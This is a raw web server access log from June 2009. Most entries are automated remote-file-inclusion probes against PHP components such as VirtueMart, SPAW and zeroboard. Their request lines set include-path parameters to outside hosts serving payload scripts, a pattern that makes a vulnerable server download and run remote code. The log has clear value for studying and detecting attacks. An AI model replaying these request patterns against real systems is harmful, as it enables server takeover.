216.17.99.13 - - [26/Jun/2009:13:41:49 -0500] "GET /logs/module.php?mod=http://www.unreals.co.cc/idxx.txt%20? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:13:41:50 -0500] "GET /logs/access_log.1238371200/module.php?mod=http://www.unreals.co.cc/idxx.txt%20? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:13:42:37 -0500] "GET /logs/access_log.1230336000/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
62.140.23.185 - - [26/Jun/2009:13:43:33 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
62.140.23.185 - - [26/Jun/2009:13:43:33 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.803"
62.140.23.185 - - [26/Jun/2009:13:43:33 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
82.194.87.219 - - [26/Jun/2009:13:43:54 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 340 "-""libwww-perl/5.822"
216.17.99.13 - - [26/Jun/2009:13:43:57 -0500] "GET /logs/access_log.1238371200/module.php?mod=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:13:43:57 -0500] "GET /module.php?mod=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:13:43:57 -0500] "GET /logs/module.php?mod=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
82.194.87.219 - - [26/Jun/2009:13:44:20 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 339 "-""libwww-perl/5.822"
190.144.44.36 - - [26/Jun/2009:13:46:06 -0500] "GET /logs/access_log.1237248000//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
190.144.44.36 - - [26/Jun/2009:13:46:06 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
190.144.44.36 - - [26/Jun/2009:13:46:06 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
190.144.44.36 - - [26/Jun/2009:13:46:33 -0500] "GET /logs/access_log.1238198400//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:49:38 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:49:38 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:49:39 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:49:40 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
65.55.208.130 - - [26/Jun/2009:13:49:41 -0500] "GET /logs/access_log.1236211200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
195.34.78.110 - - [26/Jun/2009:13:49:41 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:49:41 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:49:45 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:49:45 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:49:45 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.55.106.145 - - [26/Jun/2009:13:51:25 -0500] "GET /logs/access_log.1190332800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.117 - - [26/Jun/2009:13:51:27 -0500] "GET /logs/access_log.1207008000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.34.78.110 - - [26/Jun/2009:13:52:22 -0500] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:52:22 -0500] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:52:23 -0500] "GET /logs/access_log.1240358400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:52:27 -0500] "GET /logs/access_log.1240272000//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
82.194.87.219 - - [26/Jun/2009:13:52:27 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 340 "-""libwww-perl/5.822"
195.34.78.110 - - [26/Jun/2009:13:52:28 -0500] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:52:28 -0500] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:52:29 -0500] "GET /logs/access_log.1240358400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:52:33 -0500] "GET /logs/access_log.1240272000//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:52:50 -0500] "GET /logs/access_log.1241827200//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:52:55 -0500] "GET /logs/access_log.1241827200//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
77.232.68.137 - - [26/Jun/2009:13:52:58 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
77.232.68.137 - - [26/Jun/2009:13:52:58 -0500] "GET /logs/access_log.1239753600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
77.232.68.137 - - [26/Jun/2009:13:52:58 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.232.68.137 - - [26/Jun/2009:13:53:03 -0500] "GET /logs/access_log.1240099200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:54:48 -0500] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:54:48 -0500] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:54:49 -0500] "GET /logs/access_log.1240358400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:13:54:53 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:13:54:53 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:54:54 -0500] "GET /logs/access_log.1241827200//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:13:54:57 -0500] "GET /logs/access_log.1239753600//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 382 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:13:55:07 -0500] "GET /logs/access_log.1234828800//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 382 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:55:12 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:55:12 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:55:12 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:55:16 -0500] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:55:16 -0500] "GET /logs/access_log.1240358400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:55:16 -0500] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:55:17 -0500] "GET /logs/access_log.1241827200//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:55:32 -0500] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:55:32 -0500] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:55:32 -0500] "GET /logs/access_log.1240358400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:55:36 -0500] "GET /logs/access_log.1241827200//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
77.232.68.137 - - [26/Jun/2009:13:56:55 -0500] "GET /logs/access_log.1239753600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
77.232.68.137 - - [26/Jun/2009:13:56:55 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
77.232.68.137 - - [26/Jun/2009:13:56:55 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.232.68.137 - - [26/Jun/2009:13:56:55 -0500] "GET /logs/access_log.1240099200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:57:01 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:57:01 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:57:01 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
65.55.230.168 - - [26/Jun/2009:13:58:58 -0500] "GET /logs/access_log.1239321600 HTTP/1.1" 200 462705 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
124.0.139.129 - - [26/Jun/2009:14:00:12 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:14:00:17 -0500] "GET /logs/access_log.1240012800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:14:00:17 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:14:00:17 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:14:00:32 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:14:00:32 -0500] "GET /logs/access_log.1240012800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
217.147.29.190 - - [26/Jun/2009:14:01:07 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
217.147.29.190 - - [26/Jun/2009:14:01:08 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
217.147.29.190 - - [26/Jun/2009:14:01:10 -0500] "GET /logs/access_log.1235606400//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
217.147.29.190 - - [26/Jun/2009:14:01:21 -0500] "GET /logs/access_log.1234051200//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:14:02:13 -0500] "GET /logs//components/com_virtuemart/js/dtree=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:14:02:13 -0500] "GET //components/com_virtuemart/js/dtree=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:14:02:17 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/js/dtree=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 387 "-""Mozilla/5.0"
190.144.44.36 - - [26/Jun/2009:14:02:23 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
190.144.44.36 - - [26/Jun/2009:14:02:23 -0500] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
190.144.44.36 - - [26/Jun/2009:14:02:23 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:14:02:23 -0500] "GET /logs/access_log.1240444800//components/com_virtuemart/js/dtree=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 387 "-""Mozilla/5.0"
190.144.44.36 - - [26/Jun/2009:14:02:30 -0500] "GET /logs/access_log.1235088000//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
211.206.120.187 - - [26/Jun/2009:14:03:55 -0500] "GET /logs/access_log.1237161600///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.206.120.187 - - [26/Jun/2009:14:03:55 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
211.206.120.187 - - [26/Jun/2009:14:03:57 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 200 194791 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:14:04:26 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
75.125.198.130 - - [26/Jun/2009:14:04:26 -0500] "GET //include/mail.inc.php?skin_board_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.811"
66.11.230.36 - - [26/Jun/2009:14:06:25 -0500] "GET //administrator/components/com_virtuemart/html/shop.browse.php?mosCOnfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:14:06:25 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/html/shop.browse.php?mosCOnfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 371 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:14:06:25 -0500] "GET /logs//administrator/components/com_virtuemart/html/shop.browse.php?mosCOnfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:14:06:31 -0500] "GET /logs/access_log.1240444800//administrator/components/com_virtuemart/html/shop.browse.php?mosCOnfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 371 "-""Mozilla/5.0"
74.53.70.114 - - [26/Jun/2009:14:07:24 -0500] "GET //board/outlogin.php?_zb_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.53.70.114 - - [26/Jun/2009:14:07:24 -0500] "GET /logs/access_log.1230940800//board/outlogin.php?_zb_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
74.53.70.114 - - [26/Jun/2009:14:07:24 -0500] "GET /logs//board/outlogin.php?_zb_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
220.181.7.97 - - [26/Jun/2009:14:07:41 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
74.53.70.114 - - [26/Jun/2009:14:08:00 -0500] "GET /logs//bbs/_head.php?_zb_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.53.70.114 - - [26/Jun/2009:14:08:00 -0500] "GET //bbs/_head.php?_zb_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
74.53.70.114 - - [26/Jun/2009:14:08:00 -0500] "GET /logs/access_log.1230940800//bbs/_head.php?_zb_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
74.53.70.114 - - [26/Jun/2009:14:08:01 -0500] "GET /logs/access_log.1237248000//board/outlogin.php?_zb_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
190.144.44.36 - - [26/Jun/2009:14:08:17 -0500] "GET /logs/access_log.1238716800//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
65.55.208.120 - - [26/Jun/2009:14:08:31 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.120 - - [26/Jun/2009:14:08:31 -0500] "GET /logs/access_log.1129766400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.120 - - [26/Jun/2009:14:08:31 -0500] "GET /logs/access_log.1128816000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.120 - - [26/Jun/2009:14:08:31 -0500] "GET /logs/access_log.1117238400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.120 - - [26/Jun/2009:14:08:32 -0500] "GET /logs/access_log.1169424000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.53.70.114 - - [26/Jun/2009:14:09:00 -0500] "GET /logs/access_log.1237248000//bbs/_head.php?_zb_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
74.53.70.114 - - [26/Jun/2009:14:11:51 -0500] "GET //bbs/login_check.php?_zb_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
74.53.70.114 - - [26/Jun/2009:14:11:51 -0500] "GET /logs//bbs/login_check.php?_zb_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
74.53.70.114 - - [26/Jun/2009:14:11:51 -0500] "GET /logs/access_log.1230940800//bbs/login_check.php?_zb_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
91.121.137.51 - - [26/Jun/2009:14:12:26 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
91.121.137.51 - - [26/Jun/2009:14:12:26 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
123.125.64.38 - - [26/Jun/2009:14:12:51 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
74.53.70.114 - - [26/Jun/2009:14:12:54 -0500] "GET /logs/access_log.1237248000//bbs/login_check.php?_zb_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
91.121.137.51 - - [26/Jun/2009:14:14:58 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
91.121.137.51 - - [26/Jun/2009:14:14:58 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
65.55.107.180 - - [26/Jun/2009:14:16:55 -0500] "GET /logs/access_log.1125360000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.11.230.36 - - [26/Jun/2009:14:20:25 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:14:20:25 -0500] "GET /logs/access_log.1239753600//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:14:20:25 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:14:20:33 -0500] "GET /logs/access_log.1234828800//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.192 - - [26/Jun/2009:14:23:54 -0500] "GET /logs/access_log.1107216000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.85.77.74 - - [26/Jun/2009:14:24:41 -0500] "GET //include/footer.php?_path[counter]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
209.85.77.74 - - [26/Jun/2009:14:24:41 -0500] "GET /logs//include/footer.php?_path[counter]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
209.85.77.74 - - [26/Jun/2009:14:24:41 -0500] "GET /logs/access_log.1235952000//include/footer.php?_path[counter]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
